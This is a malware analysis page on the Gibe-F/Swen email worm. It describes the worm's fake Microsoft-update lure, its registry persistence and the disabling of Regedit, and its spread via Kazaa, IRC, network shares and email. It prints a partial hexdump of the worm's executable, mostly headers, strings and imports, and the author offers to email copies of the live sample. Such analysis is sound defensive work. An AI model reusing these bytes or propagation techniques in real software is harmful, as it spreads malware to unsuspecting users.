Hex dump of Gibe-F worm.

Hostile Data — Gibe-F Worm, also known as the Swen Worm

The background

This is one of the more interesting pieces of malware that I have. It's known by many names, mostly including "Gibe" and "Swen":

Gibe/Swen is a worm that replicates and spreads via electronic mail as well as IRC and Kazaa file-sharing, plus Windows network file and print sharing. It uses a vulnerability in Internet Explorer (modules of which are silently used by Outlook) to execute directly from the receiver's e-mail.

F-Secure has a dedicated disinfection tool and instructions. For more details see F-Secure's detailed description.

The executable contents

GNU utilities such as file, strings, and hexdump are useful for getting some limited idea about what this malicious code might do. The file utility reports that this executable is:
PE32 executable for MS Windows (GUI) Intel 80386 32-bit
It is 106,496 bytes long and is not compressed.

Behavior

When it executed, it checks to see if it's already installed on the target system. If not, it copies itself to a randomly-named file in c:\windows\?????.EXE (where each "?" is an upper-case letter) and creates a startup key for that file in the Registry. If the randomly generated name happened to be ABCDE.EXE, that key is:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"ABCDE.EXE" = "ABCDE.EXE /autorun" 

Therefore the worm will always be started when the system boots.

If the worm was not yet installed, a Windows messagebox titled "Microsoft Internet Update Pack" pops up, reading:
This will install Microsoft Security Update.
Do you wish to continue?
with "Yes" and "No" buttons.

Now, if the user clicks the "No" button, the worm installs itself silently! If the user clicks "Yes", a fake installation dialog box appears with a soothing progress bar and everything.

The worm extracts a list of SMTP and NNTP servers from its body and stores those lists as c:\windows\swen1.dat and c:\windows\nntpgroups.dat.

Then it disables the Registry tools so the user cannot run Regedit by creating the following Registry key:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = dword:00000001 

The worm also searches for the Kazaa client, and if found, copies itself multiple times into folders shared by Kazaa. It gives itself names suggesting that it's bootleg software, pornography, or drug related, see the list of possible file name components on F-Secure's page.

It also modifies the IRC client so as to send the worm to every user joining an IRC channel. It will send it as a file named WinZip installer.zip

Next, it attempts to spread via Windows file and print sharing. It accesses any mapped network drives looking for any one of these folders in their roots: Win95, Win98, WinMe, and Windows. If it finds any of those, it then selects a random filename and copies itself to that random filename in each of the following folders on each of those mapped network drives:

\Win*\Start menu\Programs\Startup\
\Documents and Settings\All Users\Start menu\Programs\Startup\
\Documents and Settings\Administrator\Start menu\Programs\Startup\
\Documents and Settings\Default User\Start menu\Programs\Startup\
\Winnt\Profiles\All Users\Start menu\Programs\Startup\
\Winnt\Profiles\Administrator\Start menu\Programs\Startup\
\Winnt\Profiles\Default User\Start menu\Programs\Startup\ 

Once it's installed everywhere and configured to spread via IRC and Kazaa, it starts spreading via SMTP and NNTP. It periodically scans for e-mail addresses in all HTML and ASP files on the system plus any e-mail messages stored in Outlook or in files, storing those addresses found in c:\Windows\GERMS0DBV. It also connects to the NNTP servers recorded in its swen1.dat and/or nntpgroups.dat files, searching recent messages for further addresses. Therefore it can try to spread to addresses with no prior association with the infected machine or its user.

The e-mail addresses it sends are reasonably convincing forged messages appearing to be from Microsoft announcing a security patch. The specifics of the message and its attachments are randomly changed. Again, see F-Secure's analysis for lots of details on the possible appearances of this message.

Analysis

The following is partial output for running
  hexdump -C whatever.exe
under Linux or BSD. The uncompressed nature of the worm and its complex design make for some interesting areas, especially around addresses:

Let me know if you would like your own copy of the malware itself for your own analysis. It could be compressed and then encrypted with OpenSSL for transmission via electronic mail.

00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|
00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 d8 00 00 00  |................|
00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |........!..L.!Th|
00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
00000080  7e 8b a8 52 3a ea c6 01  3a ea c6 01 3a ea c6 01  |~..R:...:...:...|
00000090  41 f6 ca 01 3b ea c6 01  b9 f6 c8 01 2d ea c6 01  |A...;.......-...|
000000a0  d2 f5 cc 01 00 ea c6 01  58 f5 d5 01 2b ea c6 01  |........X...+...|
000000b0  3a ea c7 01 9e ea c6 01  d2 f5 cd 01 31 ea c6 01  |:...........1...|
000000c0  82 ec c0 01 3b ea c6 01  52 69 63 68 3a ea c6 01  |....;...Rich:...|
000000d0  00 00 00 00 00 00 00 00  50 45 00 00 4c 01 04 00  |........PE..L...|
000000e0  70 cb 61 3f 00 00 00 00  00 00 00 00 e0 00 0f 01  |p.a?............|
000000f0  0b 01 06 00 00 d0 00 00  00 40 01 00 00 00 00 00  |.........@......|
00000100  85 ae 00 00 00 10 00 00  00 e0 00 00 00 00 40 00  |..............@.|
00000110  00 10 00 00 00 10 00 00  04 00 00 00 00 00 00 00  |................|
00000120  04 00 00 00 00 00 00 00  00 20 02 00 00 10 00 00  |......... ......|
00000130  00 00 00 00 02 00 00 00  00 00 10 00 00 10 00 00  |................|
00000140  00 00 10 00 00 10 00 00  00 00 00 00 10 00 00 00  |................|
00000150  00 00 00 00 00 00 00 00  58 ea 00 00 b4 00 00 00  |........X.......|
00000160  00 b0 01 00 a8 67 00 00  00 00 00 00 00 00 00 00  |.....g..........|
00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000001b0  00 e0 00 00 70 02 00 00  00 00 00 00 00 00 00 00  |....p...........|
000001c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000001d0  2e 74 65 78 74 00 00 00  55 ca 00 00 00 10 00 00  |.text...U.......|
000001e0  00 d0 00 00 00 10 00 00  00 00 00 00 00 00 00 00  |................|
000001f0  00 00 00 00 20 00 00 60  2e 72 64 61 74 61 00 00  |.... ..`.rdata..|
00000200  b6 16 00 00 00 e0 00 00  00 20 00 00 00 e0 00 00  |......... ......|
00000210  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 40  |............@..@|
00000220  2e 64 61 74 61 00 00 00  fc ae 00 00 00 00 01 00  |.data...........|
00000230  00 30 00 00 00 00 01 00  00 00 00 00 00 00 00 00  |.0..............|
00000240  00 00 00 00 40 00 00 c0  2e 72 73 72 63 00 00 00  |....@....rsrc...|
00000250  a8 67 00 00 00 b0 01 00  00 70 00 00 00 30 01 00  |.g.......p...0..|
00000260  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 40  |............@..@|
00000270  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000  55 8b ec 6a ff 68 70 e2  40 00 68 84 a3 40 00 64  |U..j.hp.@.h..@.d|
00001010  a1 00 00 00 00 50 64 89  25 00 00 00 00 81 ec 14  |.....Pd.%.......|
00001020  01 00 00 53 56 57 89 65  e8 33 ff 89 7d fc 89 bd  |...SVW.e.3..}...|
00001030  dc fe ff ff 8b 75 08 56  e8 d3 91 00 00 59 85 c0  |.....u.V.....Y..|
00001040  74 77 39 7d 0c 74 10 6a  5c 56 e8 91 91 00 00 59  |tw9}.t.j\V.....Y|
[....]
0000e5e0  ff ff ff ff 59 9a 40 00  5d 9a 40 00 00 00 00 00  |....Y.@.].@.....|
0000e5f0  ff ff ff ff e3 9f 40 00  e7 9f 40 00 00 00 00 00  |......@...@.....|
0000e600  ff ff ff ff 6e af 40 00  82 af 40 00 72 75 6e 74  |....n.@...@.runt|
0000e610  69 6d 65 20 65 72 72 6f  72 20 00 00 54 4c 4f 53  |ime error ..TLOS|
0000e620  53 20 65 72 72 6f 72 0d  0a 00 00 00 53 49 4e 47  |S error.....SING|
0000e630  20 65 72 72 6f 72 0d 0a  00 00 00 00 44 4f 4d 41  | error......DOMA|
0000e640  49 4e 20 65 72 72 6f 72  0d 0a 00 00 52 36 30 32  |IN error....R602|
0000e650  38 0d 0a 2d 20 75 6e 61  62 6c 65 20 74 6f 20 69  |8..- unable to i|
0000e660  6e 69 74 69 61 6c 69 7a  65 20 68 65 61 70 0d 0a  |nitialize heap..|
0000e670  00 00 00 00 52 36 30 32  37 0d 0a 2d 20 6e 6f 74  |....R6027..- not|
0000e680  20 65 6e 6f 75 67 68 20  73 70 61 63 65 20 66 6f  | enough space fo|
0000e690  72 20 6c 6f 77 69 6f 20  69 6e 69 74 69 61 6c 69  |r lowio initiali|
0000e6a0  7a 61 74 69 6f 6e 0d 0a  00 00 00 00 52 36 30 32  |zation......R602|
0000e6b0  36 0d 0a 2d 20 6e 6f 74  20 65 6e 6f 75 67 68 20  |6..- not enough |
0000e6c0  73 70 61 63 65 20 66 6f  72 20 73 74 64 69 6f 20  |space for stdio |
0000e6d0  69 6e 69 74 69 61 6c 69  7a 61 74 69 6f 6e 0d 0a  |initialization..|
0000e6e0  00 00 00 00 52 36 30 32  35 0d 0a 2d 20 70 75 72  |....R6025..- pur|
0000e6f0  65 20 76 69 72 74 75 61  6c 20 66 75 6e 63 74 69  |e virtual functi|
0000e700  6f 6e 20 63 61 6c 6c 0d  0a 00 00 00 52 36 30 32  |on call.....R602|
0000e710  34 0d 0a 2d 20 6e 6f 74  20 65 6e 6f 75 67 68 20  |4..- not enough |
0000e720  73 70 61 63 65 20 66 6f  72 20 5f 6f 6e 65 78 69  |space for _onexi|
0000e730  74 2f 61 74 65 78 69 74  20 74 61 62 6c 65 0d 0a  |t/atexit table..|
0000e740  00 00 00 00 52 36 30 31  39 0d 0a 2d 20 75 6e 61  |....R6019..- una|
0000e750  62 6c 65 20 74 6f 20 6f  70 65 6e 20 63 6f 6e 73  |ble to open cons|
0000e760  6f 6c 65 20 64 65 76 69  63 65 0d 0a 00 00 00 00  |ole device......|
0000e770  52 36 30 31 38 0d 0a 2d  20 75 6e 65 78 70 65 63  |R6018..- unexpec|
0000e780  74 65 64 20 68 65 61 70  20 65 72 72 6f 72 0d 0a  |ted heap error..|
0000e790  00 00 00 00 52 36 30 31  37 0d 0a 2d 20 75 6e 65  |....R6017..- une|
0000e7a0  78 70 65 63 74 65 64 20  6d 75 6c 74 69 74 68 72  |xpected multithr|
0000e7b0  65 61 64 20 6c 6f 63 6b  20 65 72 72 6f 72 0d 0a  |ead lock error..|
0000e7c0  00 00 00 00 52 36 30 31  36 0d 0a 2d 20 6e 6f 74  |....R6016..- not|
0000e7d0  20 65 6e 6f 75 67 68 20  73 70 61 63 65 20 66 6f  | enough space fo|
0000e7e0  72 20 74 68 72 65 61 64  20 64 61 74 61 0d 0a 00  |r thread data...|
0000e7f0  0d 0a 61 62 6e 6f 72 6d  61 6c 20 70 72 6f 67 72  |..abnormal progr|
0000e800  61 6d 20 74 65 72 6d 69  6e 61 74 69 6f 6e 0d 0a  |am termination..|
0000e810  00 00 00 00 52 36 30 30  39 0d 0a 2d 20 6e 6f 74  |....R6009..- not|
0000e820  20 65 6e 6f 75 67 68 20  73 70 61 63 65 20 66 6f  | enough space fo|
0000e830  72 20 65 6e 76 69 72 6f  6e 6d 65 6e 74 0d 0a 00  |r environment...|
0000e840  52 36 30 30 38 0d 0a 2d  20 6e 6f 74 20 65 6e 6f  |R6008..- not eno|
0000e850  75 67 68 20 73 70 61 63  65 20 66 6f 72 20 61 72  |ugh space for ar|
0000e860  67 75 6d 65 6e 74 73 0d  0a 00 00 00 52 36 30 30  |guments.....R600|
0000e870  32 0d 0a 2d 20 66 6c 6f  61 74 69 6e 67 20 70 6f  |2..- floating po|
0000e880  69 6e 74 20 6e 6f 74 20  6c 6f 61 64 65 64 0d 0a  |int not loaded..|
0000e890  00 00 00 00 4d 69 63 72  6f 73 6f 66 74 20 56 69  |....Microsoft Vi|
0000e8a0  73 75 61 6c 20 43 2b 2b  20 52 75 6e 74 69 6d 65  |sual C++ Runtime|
0000e8b0  20 4c 69 62 72 61 72 79  00 00 00 00 0a 0a 00 00  | Library........|
0000e8c0  52 75 6e 74 69 6d 65 20  45 72 72 6f 72 21 0a 0a  |Runtime Error!..|
0000e8d0  50 72 6f 67 72 61 6d 3a  20 00 00 00 2e 2e 2e 00  |Program: .......|
0000e8e0  3c 70 72 6f 67 72 61 6d  20 6e 61 6d 65 20 75 6e  |<program name un|
0000e8f0  6b 6e 6f 77 6e 3e 00 00  00 00 00 00 00 00 00 00  |known>..........|
0000e900  ff ff ff ff 3d cb 40 00  41 cb 40 00 47 65 74 4c  |....=.@.A.@.GetL|
0000e910  61 73 74 41 63 74 69 76  65 50 6f 70 75 70 00 00  |astActivePopup..|
0000e920  47 65 74 41 63 74 69 76  65 57 69 6e 64 6f 77 00  |GetActiveWindow.|
0000e930  4d 65 73 73 61 67 65 42  6f 78 41 00 75 73 65 72  |MessageBoxA.user|
0000e940  33 32 2e 64 6c 6c 00 00  ff ff ff ff 25 d5 40 00  |32.dll......%.@.|
0000e950  29 d5 40 00 ff ff ff ff  d9 d5 40 00 dd d5 40 00  |).@.......@...@.|
0000e960  48 3a 6d 6d 3a 73 73 00  64 64 64 64 2c 20 4d 4d  |H:mm:ss.dddd, MM|
0000e970  4d 4d 20 64 64 2c 20 79  79 79 79 00 4d 2f 64 2f  |MM dd, yyyy.M/d/|
0000e980  79 79 00 00 50 4d 00 00  41 4d 00 00 44 65 63 00  |yy..PM..AM..Dec.|
0000e990  4e 6f 76 00 4f 63 74 00  53 65 70 00 41 75 67 00  |Nov.Oct.Sep.Aug.|
0000e9a0  4a 75 6c 00 4a 75 6e 00  41 70 72 00 4d 61 72 00  |Jul.Jun.Apr.Mar.|
0000e9b0  46 65 62 00 4a 61 6e 00  53 61 74 75 72 64 61 79  |Feb.Jan.Saturday|
0000e9c0  00 00 00 00 46 72 69 64  61 79 00 00 54 68 75 72  |....Friday..Thur|
0000e9d0  73 64 61 79 00 00 00 00  57 65 64 6e 65 73 64 61  |sday....Wednesda|
0000e9e0  79 00 00 00 54 75 65 73  64 61 79 00 4d 6f 6e 64  |y...Tuesday.Mond|
0000e9f0  61 79 00 00 53 75 6e 64  61 79 00 00 53 61 74 00  |ay..Sunday..Sat.|
0000ea00  46 72 69 00 54 68 75 00  57 65 64 00 54 75 65 00  |Fri.Thu.Wed.Tue.|
0000ea10  4d 6f 6e 00 53 75 6e 00  53 75 6e 4d 6f 6e 54 75  |Mon.Sun.SunMonTu|
0000ea20  65 57 65 64 54 68 75 46  72 69 53 61 74 00 00 00  |eWedThuFriSat...|
0000ea30  4a 61 6e 46 65 62 4d 61  72 41 70 72 4d 61 79 4a  |JanFebMarAprMayJ|
0000ea40  75 6e 4a 75 6c 41 75 67  53 65 70 4f 63 74 4e 6f  |unJulAugSepOctNo|
0000ea50  76 44 65 63 00 00 00 00  4c eb 00 00 00 00 00 00  |vDec....L.......|
0000ea60  00 00 00 00 b8 f0 00 00  40 e0 00 00 bc ec 00 00  |........@.......|
0000ea70  00 00 00 00 00 00 00 00  c0 f2 00 00 b0 e1 00 00  |................|
0000ea80  34 eb 00 00 00 00 00 00  00 00 00 00 1e f3 00 00  |4...............|
[....]
0000ed40  08 f4 00 00 f6 f3 00 00  00 00 00 00 09 00 00 80  |................|
0000ed50  74 00 00 80 73 00 00 80  13 00 00 80 0a 00 00 80  |t...s...........|
0000ed60  34 00 00 80 04 00 00 80  65 00 00 80 03 00 00 80  |4.......e.......|
0000ed70  17 00 00 80 10 00 00 80  00 00 00 00 1b 00 43 6c  |..............Cl|
0000ed80  6f 73 65 48 61 6e 64 6c  65 00 9e 02 54 65 72 6d  |oseHandle...Term|
0000ed90  69 6e 61 74 65 50 72 6f  63 65 73 73 00 00 ce 02  |inateProcess....|
0000eda0  57 61 69 74 46 6f 72 53  69 6e 67 6c 65 4f 62 6a  |WaitForSingleObj|
0000edb0  65 63 74 00 ef 01 4f 70  65 6e 50 72 6f 63 65 73  |ect...OpenProces|
0000edc0  73 00 7d 00 45 78 69 74  50 72 6f 63 65 73 73 00  |s.}.ExitProcess.|
0000edd0  26 01 47 65 74 4d 6f 64  75 6c 65 48 61 6e 64 6c  |&.GetModuleHandl|
0000ede0  65 41 00 00 b4 00 46 72  65 65 4c 69 62 72 61 72  |eA....FreeLibrar|
0000edf0  79 00 3e 01 47 65 74 50  72 6f 63 41 64 64 72 65  |y.>.GetProcAddre|
0000ee00  73 73 00 00 c2 01 4c 6f  61 64 4c 69 62 72 61 72  |ss....LoadLibrar|
0000ee10  79 41 00 00 96 02 53 6c  65 65 70 00 65 02 53 65  |yA....Sleep.e.Se|
0000ee20  74 45 76 65 6e 74 00 00  c1 01 4c 65 61 76 65 43  |tEvent....LeaveC|
0000ee30  72 69 74 69 63 61 6c 53  65 63 74 69 6f 6e 00 00  |riticalSection..|
0000ee40  66 00 45 6e 74 65 72 43  72 69 74 69 63 61 6c 53  |f.EnterCriticalS|
0000ee50  65 63 74 69 6f 6e 00 00  2b 02 52 65 73 65 74 45  |ection..+.ResetE|
0000ee60  76 65 6e 74 00 00 df 02  57 72 69 74 65 46 69 6c  |vent....WriteFil|
0000ee70  65 00 6a 02 53 65 74 46  69 6c 65 50 6f 69 6e 74  |e.j.SetFilePoint|
0000ee80  65 72 00 00 34 00 43 72  65 61 74 65 46 69 6c 65  |er..4.CreateFile|
0000ee90  41 00 61 02 53 65 74 45  6e 64 4f 66 46 69 6c 65  |A.a.SetEndOfFile|
0000eea0  00 00 57 00 44 65 6c 65  74 65 46 69 6c 65 41 00  |..W.DeleteFileA.|
0000eeb0  18 02 52 65 61 64 46 69  6c 65 00 00 12 01 47 65  |..ReadFile....Ge|
0000eec0  74 46 69 6c 65 53 69 7a  65 00 b6 00 46 72 65 65  |tFileSize...Free|
0000eed0  52 65 73 6f 75 72 63 65  00 00 c7 01 4c 6f 61 64  |Resource....Load|
0000eee0  52 65 73 6f 75 72 63 65  00 00 95 02 53 69 7a 65  |Resource....Size|
0000eef0  6f 66 52 65 73 6f 75 72  63 65 00 00 a3 00 46 69  |ofResource....Fi|
0000ef00  6e 64 52 65 73 6f 75 72  63 65 41 00 24 01 47 65  |ndResourceA.$.Ge|
0000ef10  74 4d 6f 64 75 6c 65 46  69 6c 65 4e 61 6d 65 41  |tModuleFileNameA|
0000ef20  00 00 5d 01 47 65 74 53  79 73 74 65 6d 54 69 6d  |..].GetSystemTim|
0000ef30  65 00 ce 00 47 65 74 43  6f 6d 70 75 74 65 72 4e  |e...GetComputerN|
0000ef40  61 6d 65 41 00 00 64 02  53 65 74 45 72 72 6f 72  |ameA..d.SetError|
0000ef50  4d 6f 64 65 00 00 75 01  47 65 74 56 65 72 73 69  |Mode..u.GetVersi|
0000ef60  6f 6e 45 78 41 00 7d 01  47 65 74 57 69 6e 64 6f  |onExA.}.GetWindo|
0000ef70  77 73 44 69 72 65 63 74  6f 72 79 41 00 00 4a 00  |wsDirectoryA..J.|
0000ef80  43 72 65 61 74 65 54 68  72 65 61 64 00 00 31 00  |CreateThread..1.|
0000ef90  43 72 65 61 74 65 45 76  65 6e 74 41 00 00 aa 01  |CreateEventA....|
0000efa0  49 6e 69 74 69 61 6c 69  7a 65 43 72 69 74 69 63  |InitializeCritic|
0000efb0  61 6c 53 65 63 74 69 6f  6e 00 55 00 44 65 6c 65  |alSection.U.Dele|
0000efc0  74 65 43 72 69 74 69 63  61 6c 53 65 63 74 69 6f  |teCriticalSectio|
0000efd0  6e 00 08 03 6c 73 74 72  6c 65 6e 41 00 00 6d 01  |n...lstrlenA..m.|
0000efe0  47 65 74 54 69 63 6b 43  6f 75 6e 74 00 00 44 00  |GetTickCount..D.|
0000eff0  43 72 65 61 74 65 50 72  6f 63 65 73 73 41 00 00  |CreateProcessA..|
0000f000  04 01 47 65 74 44 72 69  76 65 54 79 70 65 41 00  |..GetDriveTypeA.|
0000f010  20 01 47 65 74 4c 6f 67  69 63 61 6c 44 72 69 76  | .GetLogicalDriv|
0000f020  65 73 00 00 90 00 46 69  6e 64 43 6c 6f 73 65 00  |es....FindClose.|
0000f030  9d 00 46 69 6e 64 4e 65  78 74 46 69 6c 65 41 00  |..FindNextFileA.|
0000f040  94 00 46 69 6e 64 46 69  72 73 74 46 69 6c 65 41  |..FindFirstFileA|
0000f050  00 00 0d 01 47 65 74 46  69 6c 65 41 74 74 72 69  |....GetFileAttri|
0000f060  62 75 74 65 73 41 00 00  28 00 43 6f 70 79 46 69  |butesA..(.CopyFi|
0000f070  6c 65 41 00 dd 01 4d 6f  76 65 46 69 6c 65 41 00  |leA...MoveFileA.|
0000f080  2d 00 43 72 65 61 74 65  44 69 72 65 63 74 6f 72  |-.CreateDirector|
0000f090  79 41 00 00 65 01 47 65  74 54 65 6d 70 50 61 74  |yA..e.GetTempPat|
0000f0a0  68 41 00 00 4e 01 47 65  74 53 68 6f 72 74 50 61  |hA..N.GetShortPa|
0000f0b0  74 68 4e 61 6d 65 41 00  4b 45 52 4e 45 4c 33 32  |thNameA.KERNEL32|
0000f0c0  2e 64 6c 6c 00 00 21 00  43 68 61 72 4c 6f 77 65  |.dll..!.CharLowe|
0000f0d0  72 41 00 00 ac 02 77 73  70 72 69 6e 74 66 41 00  |rA....wsprintfA.|
0000f0e0  de 01 50 6f 73 74 4d 65  73 73 61 67 65 41 00 00  |..PostMessageA..|
0000f0f0  62 01 47 65 74 57 69 6e  64 6f 77 54 68 72 65 61  |b.GetWindowThrea|
0000f100  64 50 72 6f 63 65 73 73  49 64 00 00 35 01 47 65  |dProcessId..5.Ge|
0000f110  74 50 61 72 65 6e 74 00  d0 00 45 6e 75 6d 57 69  |tParent...EnumWi|
0000f120  6e 64 6f 77 73 00 be 01  4d 65 73 73 61 67 65 42  |ndows...MessageB|
0000f130  6f 78 41 00 2f 00 43 68  61 72 55 70 70 65 72 41  |oxA./.CharUpperA|
0000f140  00 00 95 00 44 69 73 70  61 74 63 68 4d 65 73 73  |....DispatchMess|
0000f150  61 67 65 41 00 00 2a 01  47 65 74 4d 65 73 73 61  |ageA..*.GetMessa|
0000f160  67 65 41 00 52 02 53 65  74 54 69 6d 65 72 00 00  |geA.R.SetTimer..|
0000f170  59 00 43 72 65 61 74 65  57 69 6e 64 6f 77 45 78  |Y.CreateWindowEx|
0000f180  41 00 f3 01 52 65 67 69  73 74 65 72 43 6c 61 73  |A...RegisterClas|
0000f190  73 45 78 41 00 00 d5 00  46 69 6e 64 57 69 6e 64  |sExA....FindWind|
0000f1a0  6f 77 41 00 93 00 44 69  61 6c 6f 67 42 6f 78 50  |owA...DialogBoxP|
0000f1b0  61 72 61 6d 41 00 6a 02  53 68 6f 77 57 69 6e 64  |aramA.j.ShowWind|
0000f1c0  6f 77 00 00 b7 00 45 6e  61 62 6c 65 57 69 6e 64  |ow....EnableWind|
0000f1d0  6f 77 00 00 02 01 47 65  74 44 6c 67 49 74 65 6d  |ow....GetDlgItem|
0000f1e0  00 00 04 01 47 65 74 44  6c 67 49 74 65 6d 54 65  |....GetDlgItemTe|
0000f1f0  78 74 41 00 b9 00 45 6e  64 44 69 61 6c 6f 67 00  |xtA...EndDialog.|
0000f200  e0 01 50 6f 73 74 51 75  69 74 4d 65 73 73 61 67  |..PostQuitMessag|
0000f210  65 00 84 00 44 65 66 57  69 6e 64 6f 77 50 72 6f  |e...DefWindowPro|
0000f220  63 41 00 00 2f 02 53 65  74 46 6f 63 75 73 00 00  |cA../.SetFocus..|
0000f230  03 02 52 65 6c 65 61 73  65 44 43 00 5e 02 53 65  |..ReleaseDC.^.Se|
0000f240  74 57 69 6e 64 6f 77 54  65 78 74 41 00 00 f0 00  |tWindowTextA....|
0000f250  47 65 74 43 6c 69 65 6e  74 52 65 63 74 00 fd 00  |GetClientRect...|
0000f260  47 65 74 44 43 00 91 02  55 70 64 61 74 65 57 69  |GetDC...UpdateWi|
0000f270  6e 64 6f 77 00 00 88 01  49 73 44 69 61 6c 6f 67  |ndow....IsDialog|
0000f280  4d 65 73 73 61 67 65 41  00 00 dc 01 50 65 65 6b  |MessageA....Peek|
0000f290  4d 65 73 73 61 67 65 41  00 00 4f 00 43 72 65 61  |MessageA..O.Crea|
0000f2a0  74 65 44 69 61 6c 6f 67  50 61 72 61 6d 41 00 00  |teDialogParamA..|
0000f2b0  d3 00 45 78 69 74 57 69  6e 64 6f 77 73 45 78 00  |..ExitWindowsEx.|
0000f2c0  55 53 45 52 33 32 2e 64  6c 6c 00 00 53 00 44 65  |USER32.dll..S.De|
0000f2d0  6c 65 74 65 4f 62 6a 65  63 74 00 00 af 01 52 65  |leteObject....Re|
0000f2e0  63 74 61 6e 67 6c 65 00  c7 01 53 65 6c 65 63 74  |ctangle...Select|
0000f2f0  4f 62 6a 65 63 74 00 00  5f 01 47 65 74 53 74 6f  |Object.._.GetSto|
0000f300  63 6b 4f 62 6a 65 63 74  00 00 4d 00 43 72 65 61  |ckObject..M.Crea|
0000f310  74 65 53 6f 6c 69 64 42  72 75 73 68 00 00 47 44  |teSolidBrush..GD|
0000f320  49 33 32 2e 64 6c 6c 00  d7 00 47 65 74 55 73 65  |I32.dll...GetUse|
0000f330  72 4e 61 6d 65 41 00 00  5b 01 52 65 67 43 6c 6f  |rNameA..[.RegClo|
0000f340  73 65 4b 65 79 00 86 01  52 65 67 53 65 74 56 61  |seKey...RegSetVa|
0000f350  6c 75 65 45 78 41 00 00  5f 01 52 65 67 43 72 65  |lueExA.._.RegCre|
0000f360  61 74 65 4b 65 79 45 78  41 00 7b 01 52 65 67 51  |ateKeyExA.{.RegQ|
0000f370  75 65 72 79 56 61 6c 75  65 45 78 41 00 00 72 01  |ueryValueExA..r.|
0000f380  52 65 67 4f 70 65 6e 4b  65 79 45 78 41 00 67 01  |RegOpenKeyExA.g.|
0000f390  52 65 67 45 6e 75 6d 4b  65 79 45 78 41 00 62 01  |RegEnumKeyExA.b.|
0000f3a0  52 65 67 44 65 6c 65 74  65 4b 65 79 41 00 64 01  |RegDeleteKeyA.d.|
0000f3b0  52 65 67 44 65 6c 65 74  65 56 61 6c 75 65 41 00  |RegDeleteValueA.|
0000f3c0  41 44 56 41 50 49 33 32  2e 64 6c 6c 00 00 72 00  |ADVAPI32.dll..r.|
0000f3d0  53 68 65 6c 6c 45 78 65  63 75 74 65 41 00 53 48  |ShellExecuteA.SH|
0000f3e0  45 4c 4c 33 32 2e 64 6c  6c 00 57 53 4f 43 4b 33  |ELL32.dll.WSOCK3|
0000f3f0  32 2e 64 6c 6c 00 0a 00  56 65 72 51 75 65 72 79  |2.dll...VerQuery|
0000f400  56 61 6c 75 65 41 00 00  00 00 47 65 74 46 69 6c  |ValueA....GetFil|
0000f410  65 56 65 72 73 69 6f 6e  49 6e 66 6f 41 00 56 45  |eVersionInfoA.VE|
0000f420  52 53 49 4f 4e 2e 64 6c  6c 00 03 00 4c 5a 43 6c  |RSION.dll...LZCl|
0000f430  6f 73 65 00 04 00 4c 5a  43 6f 70 79 00 00 07 00  |ose...LZCopy....|
0000f440  4c 5a 4f 70 65 6e 46 69  6c 65 41 00 4c 5a 33 32  |LZOpenFileA.LZ32|
0000f450  2e 64 6c 6c 00 00 2f 02  52 74 6c 55 6e 77 69 6e  |.dll../.RtlUnwin|
0000f460  64 00 50 01 47 65 74 53  74 61 72 74 75 70 49 6e  |d.P.GetStartupIn|
0000f470  66 6f 41 00 ca 00 47 65  74 43 6f 6d 6d 61 6e 64  |foA...GetCommand|
0000f480  4c 69 6e 65 41 00 74 01  47 65 74 56 65 72 73 69  |LineA.t.GetVersi|
0000f490  6f 6e 00 00 99 01 48 65  61 70 41 6c 6c 6f 63 00  |on....HeapAlloc.|
0000f4a0  9f 01 48 65 61 70 46 72  65 65 00 00 f7 00 47 65  |..HeapFree....Ge|
0000f4b0  74 43 75 72 72 65 6e 74  50 72 6f 63 65 73 73 00  |tCurrentProcess.|
0000f4c0  a2 01 48 65 61 70 52 65  41 6c 6c 6f 63 00 a3 01  |..HeapReAlloc...|
0000f4d0  48 65 61 70 53 69 7a 65  00 00 fa 00 47 65 74 43  |HeapSize....GetC|
0000f4e0  75 72 72 65 6e 74 54 68  72 65 61 64 49 64 00 00  |urrentThreadId..|
0000f4f0  a5 02 54 6c 73 53 65 74  56 61 6c 75 65 00 a2 02  |..TlsSetValue...|
0000f500  54 6c 73 41 6c 6c 6f 63  00 00 71 02 53 65 74 4c  |TlsAlloc..q.SetL|
0000f510  61 73 74 45 72 72 6f 72  00 00 a4 02 54 6c 73 47  |astError....TlsG|
0000f520  65 74 56 61 6c 75 65 00  1a 01 47 65 74 4c 61 73  |etValue...GetLas|
0000f530  74 45 72 72 6f 72 00 00  ad 02 55 6e 68 61 6e 64  |tError..-.Unhand|
0000f540  6c 65 64 45 78 63 65 70  74 69 6f 6e 46 69 6c 74  |ledExceptionFilt|
0000f550  65 72 00 00 b2 00 46 72  65 65 45 6e 76 69 72 6f  |er....FreeEnviro|
0000f560  6e 6d 65 6e 74 53 74 72  69 6e 67 73 41 00 b3 00  |nmentStringsA...|
0000f570  46 72 65 65 45 6e 76 69  72 6f 6e 6d 65 6e 74 53  |FreeEnvironmentS|
0000f580  74 72 69 6e 67 73 57 00  d2 02 57 69 64 65 43 68  |tringsW...WideCh|
0000f590  61 72 54 6f 4d 75 6c 74  69 42 79 74 65 00 06 01  |arToMultiByte...|
0000f5a0  47 65 74 45 6e 76 69 72  6f 6e 6d 65 6e 74 53 74  |GetEnvironmentSt|
0000f5b0  72 69 6e 67 73 00 08 01  47 65 74 45 6e 76 69 72  |rings...GetEnvir|
0000f5c0  6f 6e 6d 65 6e 74 53 74  72 69 6e 67 73 57 00 00  |onmentStringsW..|
0000f5d0  6d 02 53 65 74 48 61 6e  64 6c 65 43 6f 75 6e 74  |m.SetHandleCount|
